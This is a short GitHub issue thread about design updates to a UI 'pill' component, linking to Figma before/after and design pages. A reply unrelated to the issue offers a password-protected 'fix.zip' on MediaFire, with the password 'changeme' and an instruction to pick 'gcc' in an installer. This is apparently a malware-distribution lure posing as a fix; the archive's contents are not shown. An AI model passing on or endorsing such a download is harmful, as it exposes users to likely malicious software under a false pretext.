### ISSUE TITLE
UIv2 Pill updates

### ISSUE THREAD

**Issue by grod220** [penumbra-zone/web#1730]
New updates to the pill:

Before/after comparison: https://www.figma.com/design/WKgXSVVK3L0EI0sr9Hwjoa/penumbra-UI-library?node-id=237-15466&cc-version-id=6488412680&m=dev

Designs: https://www.figma.com/design/WKgXSVVK3L0EI0sr9Hwjoa/penumbra-UI-library?node-id=237-15466&m=dev

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
